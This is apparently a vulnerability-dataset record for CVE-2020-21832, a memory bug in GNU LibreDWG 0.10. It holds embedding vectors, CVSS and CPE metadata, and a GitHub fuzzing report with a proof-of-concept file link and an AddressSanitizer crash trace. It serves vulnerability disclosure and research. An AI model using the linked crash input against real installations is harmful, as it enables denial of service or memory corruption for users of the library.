0.0024329214356839657, -0.006013719830662012, 0.016590069979429245, -0.003335340414196253, -0.005652752239257097, 0.007269887253642082, 0.0005522803985513747, 0.015463851392269135, 0.0034111435525119305, 0.007883531972765923, 0.005876552313566208, -0.005706897471100092, 0.0038045982364565134, 0.008591028861701488, 0.00846829917281866, 0.0012101437896490097, 0.006739264819771051, 0.0034544598311185837, 0.008641564287245274, -0.010699079371988773, -0.0229142215102911, -0.013420774601399899, -0.0006664363900199533, 0.00837444793432951, 0.017196495085954666, 0.019781023263931274, -0.007295154966413975, 0.00046970907715149224, 0.011283846572041512, -0.007255448494106531, 0.027664555236697197, -0.023665035143494606, -0.019145719707012177, -0.006490197032690048, 0.019376739859580994, 0.014113832265138626, 0.007222961168736219, 0.005006620194762945, -0.021845757961273193, 0.001331970328465104, 0.0015061371959745884, -0.026321755722165108, -0.010244259610772133, -0.0023661425802856684, -0.0007995432242751122, 0.004223320633172989, -0.011984123848378658, -0.026365071535110474, -0.023982686921954155, -0.02136928029358387, -0.012020220048725605, -0.016301296651363373, 0.025628698989748955, -0.0025989667046815157, -0.0071435486897826195, -0.0026910132728517056, -0.001271508284844458, -0.01695103757083416, -0.030148012563586235, -0.006692339200526476, -0.030379030853509903, 0.019983164966106415, 0.022755395621061325, -0.03892674297094345, -0.013702329248189926, 0.025830840691924095, 0.0022109264973551035, 0.032804735004901886, 0.00887980218976736, 0.004118639975786209, -0.03297799825668335, -0.01283600740134716, -0.01043196301907301, -0.0024581891484558582, -0.008511615917086601, -0.030783316120505333, 0.010821808129549026, -0.019853217527270317, 0.009876073338091373, -0.009305744431912899, 0.0016424024943262339, 0.0028841309249401093, -0.0024004343431442976, 0.0031133454758673906, -0.024011563509702682, 0.005194323603063822, -0.006966674234718084, -0.005201542750000954, -0.0018003258155658841, -0.004714236594736576, 0.006919748615473509, 0.011038389056921005, 0.017528586089611053, -0.019679952412843704, -0.023968247696757317, -0.0027938890270888805, 0.022206725552678108, 0.0053206621669232845, 0.0275346077978611, -0.013608478009700775, 0.009587299078702927, -0.022134531289339066, -0.00024590917746536434, -0.016301296651363373, 0.01787511445581913, -0.012482259422540665, 0.009933827444911003, -0.004024788737297058, -0.001237216405570507, 0.0015467461198568344, -0.010980634018778801, -0.0006957650184631348, 0.007049696985632181, -0.0036114805843681097, 0.004039227031171322, 0.015579360537230968, -0.012402846477925777, 0.013529065065085888, 0.01572374813258648, -0.006778971292078495, -0.022639887407422066, 0.009024189785122871, 0.004288294818252325, -0.00464926240965724, -0.013363019563257694, 0.023708350956439972, -0.006941406521946192, -0.01043196301907301, -0.020358571782708168, -0.008605467155575752, -0.014193245209753513, -0.02775118686258793, 0.0004958792123943567, 0.018712559714913368, 0.0008180427830666304, -0.00516183627769351, -0.011305504478514194, 0.012561671435832977, 0.007331251632422209, 0.018770314753055573, 0.010049337521195412, -0.0009303939295932651, 0.001983516849577427, -0.011074485257267952, -0.007537003140896559, 0.0046384334564208984, -0.051113009452819824, 0.021398158743977547, -0.0021928781643509865, 0.01310312282294035, -0.012561671435832977, 0.004046446643769741, -0.005941526498645544, 0.005519194528460503, 0.0018093499820679426, -0.006529903504997492, -0.019434494897723198, -0.016893282532691956, 0.0015593799762427807, 0.005822407081723213, 0.015232832171022892, 0.0078113386407494545, 0.0036638209130614996, 0.0018138621235266328, -0.017427515238523483, -0.018929140642285347, 0.001400554203428328, 0.01211407221853733, 0.01788955368101597, 0.004374926909804344, -0.0078113386407494545, 0.008035138249397278, -0.015463851392269135, 0.026668284088373184, 0.010439182631671429, 0.013615697622299194, -0.009183015674352646, -0.0009935633279383183, 0.0016099154017865658, -0.00039728995761834085, -0.004324391484260559, -0.010727956891059875, 0.0016712798969820142, -0.019593320786952972, -0.009493447840213776, -0.01397666521370411, 0.023260751739144325, 0.011933588422834873, -0.0029346663504838943, 0.0034869469236582518, -0.011276626959443092, 0.02093612030148506, 0.02056071348488331, 0.013832277618348598, -0.0074936868622899055, -0.00734569039195776, -0.014619187451899052, -0.004678139928728342, -0.0050788139924407005, -0.01878475211560726, 0.028083277866244316, 0.009118041023612022, 0.0245602335780859, -0.030350154265761375, -0.02496451884508133, 0.013615697622299194, 0.01674889586865902, 0.030638927593827248, 0.011846955865621567, 0.016878843307495117, -0.014467581175267696, 0.019564442336559296, 0.006685119587928057, -0.010814588516950607, -0.007897970266640186, -0.0016333783278241754, -0.015478289686143398, 0.0015999887837097049, -0.030985457822680473, 0.002358923200517893, -0.0034725081641227007, -0.023477330803871155, 0.0037540628109127283, -0.016575630754232407, 0.008850924670696259, -0.018871385604143143, 0.01991097256541252, -0.014315973967313766, -0.0042991237714886665, -0.014106613583862782, 0.008526054210960865, 0.009341840632259846, 0.013832277618348598, -0.024993395432829857, 0.017080986872315407, -0.022250041365623474, -0.01673445664346218, 0.014106613583862782, 0.012251240201294422, -0.005742994137108326, -0.01290098112076521, -0.011673691682517529, -0.01950668729841709, 0.012388407252728939, 0.0028552536386996508, -0.005418123211711645, 0.013175317086279392, 0.0002964446321129799, -0.01191193051636219, 0.010771272704005241, -0.011493207886815071, -0.011269408278167248, 0.008193964138627052, -0.008807608857750893, -0.03225606307387352, 0.005125739611685276, 0.013240290805697441, -0.017701849341392517, 0.004779210779815912, -0.010128750465810299, -0.014041638933122158, 0.016185786575078964, 0.028790773823857307, -0.0018129596719518304, 0.013442432507872581, -0.0011253164848312736, 0.008749853819608688, 0.01653231494128704, 0.007197693455964327, -0.010800150223076344, 0.007529783993959427, 0.012200703844428062, -0.011052827350795269, -0.000018527789507061243, 0.0007467516697943211, 0.021282648667693138, 0.005721336230635643, 0.03941766172647476, -0.002270486205816269, 0.0027415486983954906, -0.007381787057965994, -0.014099393971264362, 0.004660091362893581, 0.01170978881418705, -0.0047250655479729176, -0.017701849341392517, 0.010814588516950607, -0.010966194793581963, -0.006205032579600811, -0.000386460917070508, 0.008850924670696259, 0.01356516219675541, 0.022336674854159355, 0.010381427593529224, -0.012186265550553799, -0.013738426379859447, 0.00046745300642214715, 0.01775960437953472, 0.012713278643786907, -0.033757686614990234, 0.00960895698517561, 0.00004170867759967223, 0.04490436613559723, 0.01745639182627201, 0.002721695462241769, -0.002185658784583211, 0.008908679708838463, -0.0009628810221329331, -0.02669716253876686, 0.020286377519369125, -0.004457949660718441, 0.007046087179332972, 0.006685119587928057, 0.005851284600794315, 0.002016003942117095, 0.006732045207172632, 0.018467102199792862, 0.00021917500998824835, -0.01901577226817608, 0.015420535579323769, -0.007389006204903126, 0.0017046694410964847, 0.0161424707621336, 0.01744195446372032, -0.005714116618037224, -0.01910240389406681, -0.0048225270584225655, -0.004349659197032452, 0.008345570415258408, -0.01129106618463993, -0.00608952296897769, 0.0012507527135312557, -0.005338710732758045, 0.034046463668346405, 0.009356279857456684, -0.016517875716090202, 0.00007952567102620378, 0.005280955694615841, 0.016517875716090202, -0.0032378791365772486, 0.029974747449159622, -0.001719108084216714, 0.0051149106584489346, -0.0014041638933122158, 0.001563892001286149, 0.004992181435227394, 0.01104560773819685, 0.011175556108355522, -0.009695589542388916, 0.013507407158613205, 0.0037504532374441624, 0.00826615747064352, 0.020589590072631836, 0.017817359417676926, -0.0020286377985030413, 0.026653846725821495, -0.021441474556922913, -0.006865603383630514, -0.00805679615586996, -0.008396105840802193, -0.0011893882183358073, -0.006493806838989258, -0.012193485163152218, 0.014294316060841084, -0.010771272704005241, 0.002135123359039426, 0.015175077132880688, -0.032198309898376465, -0.020921681076288223, -0.009349060244858265, -0.011926368810236454, -0.0027776455972343683, 0.0051365685649216175, 0.0005360368522815406, 0.007305983919650316, 0.016517875716090202, 0.0063782972283661366, -0.0033750468865036964, 0.009630614891648293, 0.012417284771800041, 0.006771751679480076, 0.005735774990171194, -0.013933348469436169, -0.006695948541164398, 0.002099026460200548, -0.0030826630536466837, -0.02568645402789116, -0.015146199613809586, 0.00004461333810468204, -0.026134053245186806, -0.00888702180236578, -0.0074792481027543545, 0.0026603310834616423, 0.01817832700908184, 0.0049163782969117165, 0.02076285518705845, 0.012135730125010014, 0.021528106182813644, -0.020488519221544266, 0.020892804488539696, -0.018438223749399185, -0.01407773606479168, -0.0016866209916770458, -0.0021910732612013817, 0.0018319104565307498, -0.009753343649208546, -0.01940561644732952, -0.017846237868070602, 0.014539774507284164, 0.00547226844355464, 0.010554691776633263, 0.0046167755499482155, -0.012287336401641369, 0.005948745645582676, 0.0035627500619739294, 0.02402600273489952, -0.015261709690093994, -0.005169055890291929, -0.012229581363499165, -0.004068104550242424, 0.0018896652618423104, 0.00872097723186016, -0.0053206621669232845, -0.023679472506046295, 0.007356519345194101, 0.011175556108355522, 0.028415368869900703, -0.0044687786139547825, -0.00023327530652750283, 0.006822287105023861, -0.01293707825243473, -0.020517397671937943, -0.008670440874993801, 0.000028073689463781193, 0.012352311052381992, 0.006890871096402407, 0.010193724185228348, -0.007832996547222137, 0.0035952371545135975, -0.01150042749941349, 0.0012236800976097584, -0.02331850491464138, -0.0012606793316081166, 0.0037360144779086113, -0.01983877830207348, -0.026884865015745163, -0.009226331487298012, -0.008699318394064903, -0.011117802001535892, 0.007222961168736219, -0.009941047057509422, -0.009623396210372448, 0.012475039809942245, 0.031996168196201324, -0.014344851486384869, -0.001562087214551866, 0.0016378903528675437, -0.0005256590666249394, -0.0017524976283311844, -0.011117802001535892, 0.00703525822609663, 0.0051365685649216175, -0.009796660393476486, 0.006176155526190996, 0.03225606307387352, 0.008396105840802193, -0.014417044818401337, -0.021932389587163925, 0.02763567864894867, -0.020777294412255287, 0.009421253576874733, 0.01145711075514555, 0.006129229441285133, 0.019795462489128113, 0.01118999533355236, -0.02138371951878071, 0.004216101486235857, -0.026134053245186806, 0.00795572530478239, -0.006659851875156164, 0.00816508661955595, -0.0055986070074141026, -0.003844304708763957, -0.02084948681294918, 0.018438223749399185, 0.011962465941905975, -0.010655762627720833, 0.007100232411175966, -0.007897970266640186, -0.006681509781628847, -0.026567213237285614, 0.023708350956439972, 0.017600778490304947, 0.01908796653151512, 0.01355794258415699, -0.02237999066710472, 0.0016099154017865658, 0.002133318455889821, 0.006533513311296701, -0.004934426862746477, 0.0003729246382135898, 0.03072556108236313, -0.0010720737045630813, 0.009024189785122871, -0.00018601110787130892, 0.006053426302969456, 0.013196974992752075, 0.017210934311151505, -0.012438942678272724, -0.01838046871125698, 0.014157149009406567, 0.006840335670858622, -0.005981232970952988, 0.001614427543245256, 0.018048379570245743, 0.013067026622593403, -0.00475033326074481, -0.010410305112600327, 0.009565641172230244, 0.005519194528460503, 0.02567201480269432, 0.00528817530721426, -0.01777404360473156, -0.030985457822680473, 0.004252198152244091, 0.027664555236697197, 0.008749853819608688, 0.012460600584745407, 0.007666951511055231, -0.031158721074461937, -0.040832653641700745, -0.0034364114981144667, -0.013384678401052952, -0.010229821316897869, -0.011680911295115948, 0.012388407252728939, -0.01940561644732952, 0.005082423333078623, -0.0024347263388335705, -0.00919745396822691, -0.007760803215205669, 0.004086153116077185, 0.01222236268222332, 0.007905189879238605, -0.011334381997585297, -0.007529783993959427, 0.009890511631965637, 0.014568652026355267, -0.0037324049044400454, -0.023347383365035057, 0.013485749252140522, -0.0028733019717037678, -0.014359290711581707, 0.0073998356238007545, -0.014005541801452637, 0.012879323214292526, -0.010547473095357418, 0.004887501243501902, -0.002016003942117095, 0.008121770806610584, 0.0032342695631086826, -0.0012444357853382826, -0.0016685726586729288, 0.017846237868070602, 0.004187223967164755, -0.006566000171005726, -0.016907721757888794, 0.04776323214173317, -0.018654804676771164, 0.028733018785715103, 0.02496451884508133, -0.0036493821535259485, 0.009161356836557388, 0.0022343893069773912, -0.010287576355040073, 0.01991097256541252, -0.009926608763635159, 0.005479488056153059, 0.01582481898367405, 0.005620265379548073, -0.0008500786498188972, 0.00908916350454092, 0.0019708829931914806, 0.014705819077789783, -0.0074431514367461205, 0.0017561073182150722, -0.010958976112306118, 0.007522564381361008, -0.015420535579323769, -0.007710267789661884, -0.011009511537849903, -0.018221642822027206, -0.003591627348214388, 0.004970523528754711, 0.007840216159820557, -0.010670201852917671, 0.0012417284306138754, 0.026740478351712227, -0.00464926240965724, -0.02330406755208969, 0.0004841477784793824, 0.008771512657403946, -0.017326444387435913, -0.00242570205591619, 0.0038334757555276155, 0.011846955865621567, 0.01612803153693676, -0.0037865499034523964, -0.007847434841096401, -0.00991216953843832, -0.006869213189929724, -0.005104081705212593, 0.0037107467651367188, -0.02032969333231449, -0.005652752239257097, 0.012330652214586735, -0.005010230001062155, -0.01799062453210354, 0.0011939002433791757, -0.020604029297828674, -0.005208762362599373, -0.003396705025807023, 0.0022091215942054987, -0.004392975475639105, -0.004620384890586138, 0.014359290711581707, -0.001914932974614203, -0.011652033776044846, 0.007840216159820557, 0.019795462489128113, -0.03182290121912956, 0.005508365109562874, 0.0025736987590789795, 0.00919745396822691, -0.007472028955817223, -0.019853217527270317, -0.00557333929464221, -0.003232464659959078, -0.019766584038734436, 0.0026350633706897497, -0.004963304381817579, -0.0064360518008470535, 0.006721216253936291, 0.010901221074163914, 0.011926368810236454, 0.005226810462772846, 0.014532554894685745, -0.012027439661324024, 0.02617736905813217, 0.00003544814535416663, 0.005013839807361364, 0.0008771512075327337, 0.011161117814481258, -0.01601252146065235, -0.007363738492131233, 0.0005058058304712176, 0.00610757153481245, 0.0016451097326353192, 0.02301529236137867, -0.010648543946444988, -0.011485988274216652, -0.010901221074163914, -0.0063422005623579025, 0.009904950857162476, 0.006338590756058693, 0.00950066652148962, 0.0031855388078838587, 0.0010820003226399422, 0.006843945477157831, 0.012958736158907413, 0.026639407500624657, -0.015088444575667381, -0.0336710549890995, 0.008641564287245274, -0.008980873040854931, -0.010186505503952503, -0.007284326013177633, 0.00247804238460958, -0.011449892073869705, 0.01129828579723835, -0.005317052360624075, 0.020517397671937943, 0.006067865062505007, 0.0009033213718794286, -0.005003010854125023, 0.025195537135004997, 0.02916618064045906, -0.0015413315268233418, -0.010699079371988773, 0.0031458325684070587, 0.013586820103228092, -0.005428952630609274, -0.005649142898619175, -0.012467820197343826, -0.010395866818726063, 0.016590069979429245, -0.008973654359579086, 0.007796899881213903, -0.006280835717916489, 0.0029797872994095087, -0.0007444956572726369, 0.031158721074461937, -0.00877873133867979, 0.012619426473975182, -0.00600650068372488, 0.011038389056921005, 0.0009881487349048257, -0.0037396240513771772, -0.013644574210047722, -0.008634344674646854, -0.006750093773007393, -0.004779210779815912, 0.01973770745098591, 0.01726868934929371, 0.03318013995885849, 0.02197570726275444, -0.004508485086262226, -0.014741916209459305, 0.018207205459475517, 0.0006786190788261592, -0.00011325357627356425, 0.006793410051614046, -0.002339069964364171, -0.009312964044511318, 0.02752016857266426, 0.0029671534430235624, 0.011269408278167248, 0.00021082762395963073, 0.010374207980930805, -0.007934067398309708, -0.00008567339682485908, 0.007338470779359341, -0.013918910175561905, -0.009616176597774029, -0.02012755163013935, 0.007378177251666784, 0.008338350802659988, 0.016070276498794556, -0.001751595176756382, 0.01334858126938343, 0.015983644872903824, 0.028920723125338554, 0.005421733018010855, -0.006020939443260431, -0.018712559714913368, 0.033122386783361435, -0.0011406575795263052, -0.027664555236697197, 0.019333424046635628, 0.0021098554134368896, 0.010056557133793831, -0.012352311052381992, 0.008035138249397278, -0.0038695724215358496, -0.020517397671937943, -0.01002046000212431, 0.002515943953767419, 0.0054542203433811665, 0.014128271490335464, -0.013009271584451199, -0.0035465063992887735, 0.006822287105023861, -0.020185306668281555, -0.009767782874405384, 0.023953808471560478, -0.0016451097326353192, 0.0011144874151796103, -0.02350620925426483, -0.004494046326726675, -0.013225852511823177, 0.00032441961229778826, -0.009832756593823433, -0.01207797508686781, -0.005584168713539839, -0.0015521605964750051, 0.0011325357481837273, -0.013211413286626339, -0.013117562048137188, 0.014474799856543541, -0.00045684960787184536, -0.0019438103772699833, -0.011052827350795269, 0.008764293044805527, -0.010143188759684563, 0.0072518386878073215, 0.010482498444616795, -0.013579600490629673, -0.013608478009700775, -0.008973654359579086, -0.011904710903763771, 0.022062338888645172, -0.007295154966413975, 0.006490197032690048, 0.012828787788748741, 0.006020939443260431, 0.00035916274646297097, -0.0018643975490704179, -0.005226810462772846, -0.016777772456407547, 0.025224415585398674, -0.0008162379381246865, -0.012619426473975182, 0.010626886039972305, 0.002936471253633499, 0.008959215134382248, 0.024531356990337372, -0.006818677764385939, -0.009659492410719395, -0.02168693207204342, 0.010980634018778801, -0.00034314481308683753, -0.00016299942217301577, -0.013673451729118824, 0.012641084380447865, 0.0015665993560105562, -0.003775720950216055, 0.009984362870454788, -0.000054398944485001266, -0.017124302685260773, 0.011240530759096146, 0.015059567987918854, -0.005959574598819017, -0.013500187546014786, -0.005345929879695177, 0.008107331581413746, 0.012106852605938911, -0.003690893528982997, -0.017196495085954666, -0.002974372822791338, -0.022928660735487938, 0.027072569355368614, -0.021037191152572632, -0.0142726581543684, -0.024632427841424942, -0.009962704963982105, 0.00732403201982379, 0.016691140830516815, -0.03606788069009781, 0.00475033326074481, 0.003988691605627537, -0.015536044724285603, 0.020806171000003815, -0.014554212801158428, 0.022957539185881615, -0.004252198152244091, -0.011096143163740635, 0.012316213920712471, -0.0006159009644761682, 0.0004433132999110967, 0.024502480402588844, 0.0015007227193564177, -0.00858380924910307, -0.019492249935865402, -0.008193964138627052, 0.012438942678272724, 0.01324751041829586, -0.003844304708763957, -0.01032367255538702, -0.0220912154763937, -0.014474799856543541, -0.006804239004850388, -0.0074214935302734375, -0.007587538566440344, -0.0028299859259277582, 0.0046889688819646835, 0.015449412167072296, -0.003938156180083752, -0.005681629758328199, 0.001842739526182413, 0.019968725740909576, -0.027375781908631325, 0.002923837397247553, 0.002441945718601346, -0.00867766048759222, -0.008410545065999031, 0.04825414717197418, 0.010966194793581963, 0.02505115047097206, -0.011637594550848007, -0.023376259952783585, 0.0001693163503659889, 0.001947420067153871, -0.016792211681604385, 0.007703048177063465, -0.02700037509202957, -0.003912888467311859, -0.005046326667070389, 0.012886542826890945, -0.015752624720335007, -0.012337871827185154, -0.0034111435525119305, -0.0034923614002764225, 0.007093012798577547, -0.014337632805109024, -0.018322713673114777, -0.005006620194762945, -0.014929619617760181, 0.011933588422834873, -0.004634823650121689, 0.006443271413445473, 0.010482498444616795, 0.010316453874111176, -0.03644328564405441, 0.00423414958640933, 0.0006790702464058995, 0.020286377519369125, -0.007529783993959427, -0.0005563413142226636, -0.0041547371074557304, 0.006251958664506674, 0.0055625103414058685, 0.03182290121912956, 0.014814109541475773, -0.011904710903763771, -0.0019528346601873636, 0.009839976206421852, 0.012005781754851341, -0.003909279126673937, 0.007024429272860289, -0.02022862248122692, 0.003643967676907778, -0.011384917423129082, 0.02662496827542782, 0.03829143941402435, 0.01891470141708851, -0.00567801995202899, 0.014568652026355267, -0.012778252363204956, 0.014164367690682411, 0.005425342824310064, -0.006320542190223932, 0.012063536792993546, -0.010511375963687897, -0.010930098593235016, 0.0010892197024077177, -0.0023174118250608444, 0.0034905564971268177, -0.012879323214292526, -0.004064495209604502, -0.020690660923719406, 0.0019022991182282567, 0.03049454092979431, 0.012287336401641369, -0.025209976360201836, 0.02535436302423477, -0.0027993035037070513, 0.0002695976581890136, -0.013124781660735607, 0.0013166292337700725, 0.010749614797532558, -0.022365551441907883, -0.0010197333758696914, -0.014532554894685745, 0.023044170811772346, 0.008648782968521118, -0.01777404360473156, 0.00048730624257586896, 0.018611488863825798, -0.001333775231614709, 0.028906283900141716, 0.01334858126938343, 0.006490197032690048, 0.0013130195438861847, -0.0027577923610806465, -0.0015747210709378123, 0.015492728911340237, 0.00016096897888928652, -0.018972456455230713, -0.011637594550848007, 0.018337152898311615, 0.00580074917525053, -0.004948865622282028, -0.00007490077405236661, -0.007486467715352774, 0.004364097956568003, 0.01983877830207348, 0.008814828470349312, -0.023347383365035057, 0.006710387300699949, 0.01644568331539631, -0.007623635232448578, 0.03196728974580765, -0.001025147968903184, -0.023044170811772346, 0.0009073822875507176, 0.015983644872903824, 0.014019981026649475, -0.02095055766403675, -0.014828547835350037, 0.009211892262101173, 0.00995548628270626, 0.007912409491837025, -0.02096499688923359, 0.008323912508785725, 0.009580079466104507, -0.00846829917281866, -0.007165206596255302, 0.011384917423129082, -0.003916498273611069, -0.01073517557233572, 0.00300325034186244, 0.0074792481027543545, 0.02022862248122692, 0.014113832265138626, -0.0016090129502117634, 0.014597528614103794, -0.012308994308114052, 0.00929130520671606, 0.009219111874699593, 0.02158586122095585, -0.0002296656311955303, -0.02199014462530613, 0.011464330367743969, 0.01145711075514555, -0.001622549258172512, 0.008179525844752789, 0.0237372275441885, -0.012005781754851341, -0.01777404360473156, -0.01118999533355236, 0.0006010110373608768, 0.005797139368951321, -0.0018932749517261982, -0.0031819292344152927, -0.007204913068562746, 0.005432561971247196, 0.013723987154662609, 0.0057682618498802185, -0.0025231633335351944, 0.0021080507431179285, 0.030667806044220924, 0.008951996453106403, 0.03009025752544403, -0.014315973967313766, 0.0008378960192203522, -0.005934306886047125, 0.019477810710668564, 0.0049163782969117165, -0.008201183751225471, -0.004642043262720108, -0.00002904661050706636, 0.017528586089611053, -0.013579600490629673, 0.026985935866832733, 0.008396105840802193, -0.025657575577497482, -0.0008428593282587826, -0.011348821222782135, -0.014308755286037922, 0.009580079466104507, 0.0019943458028137684, 0.008287815377116203, 0.008186744526028633, 0.016590069979429245, 0.012727716937661171, 0.024069318547844887, 0.015752624720335007, -0.013875593431293964, 0.0023480940144509077, 0.029743729159235954, -0.012749374844133854, -0.008222841657698154, -0.007515345234423876, 0.02063290774822235, 0.01166647206991911, 0.01002046000212431, -0.01735532097518444, 0.02916618064045906, 0.011392137035727501, 0.005259297788143158, 0.019174598157405853, 0.009753343649208546, 0.0021730249281972647, -0.0019329814240336418, -0.0035104097332805395, 0.014561432413756847, -0.012503917329013348, 0.008244499564170837, -0.0051004718989133835 ]
182
CVE-2020-21832
2021-05-17T21:15:07.337000
A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_compressed_section ../../src/decode.c:2417.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574492612" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574492612
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.01766391098499298, 0.021469129249453545, -0.004612161312252283, 0.015413354150950909, 0.051022496074438095, 0.054102204740047455, -0.017456622794270515, 0.04480385035276413, -0.01874477043747902, 0.02783583663403988, -0.011867246590554714, 0.0011604434112086892, 0.011970890685915947, 0.012326241470873356, -0.010964062064886093, 0.014480557292699814, -0.003479479579254985, 0.007958384230732918, -0.023157047107815742, -0.02740645408630371, 0.027821030467748642, -0.005504240747541189, -0.017560267820954323, 0.02069920115172863, -0.02508186548948288, 0.004367857240140438, -0.0061890315264463425, -0.007773305289447308, -0.018211744725704193, 0.01724933460354805, 0.013792064972221851, 0.02215021848678589, 0.01794523000717163, 0.000818510539829731, 0.037548765540122986, -0.010527276434004307, 0.04406353831291199, 0.06026162579655647, 0.013118377886712551, 0.03435060754418373, 0.005659706890583038, -0.07373535633087158, -0.02149874158203602, 0.014362107031047344, -0.011837633326649666, -0.009142887778580189, 0.029494142159819603, 0.01616847515106201, -0.013140588067471981, -0.001982192974537611, -0.011371235363185406, -0.017545461654663086, -0.03538704663515091, -0.07403147965669632, 0.04264213144779205, -0.01772313565015793, 0.033580679446458817, 0.021972542628645897, 0.004656580276787281, -0.006429634056985378, -0.018108099699020386, 0.030649032443761826, -0.0033647308591753244, 0.02751009725034237, 0.006714655086398125, 0.020906489342451096, -0.04036196321249008, 0.0076474519446492195, -0.02759893611073494, -0.005485732574015856, 0.004430783912539482, -0.0449519157409668, -0.0045122187584638596, 0.027376841753721237, 0.021824480965733528, -0.006995975039899349, 0.011556314304471016, 0.011741392314434052, -0.016627470031380653, 0.022949758917093277, -0.013125781901180744, 0.042494069784879684, -0.035357434302568436, 0.017693523317575455, 0.007721483241766691, 0.006240853574126959, -0.021854093298316002, -0.08409976214170456, -0.006044670473784208, -0.04530726745724678, -0.00450851721689105, 0.030737871304154396, 0.02451922558248043, -0.008861567825078964, 0.017560267820954323, -0.011008481495082378, -0.03971048444509506, -0.017545461654663086, -0.047942787408828735, -0.011245382018387318, -0.03849637135863304, -0.005511643830686808, -0.011126931756734848, 0.011267591267824173, 0.03204082325100899, 0.018537482246756554, 0.0034313590731471777, 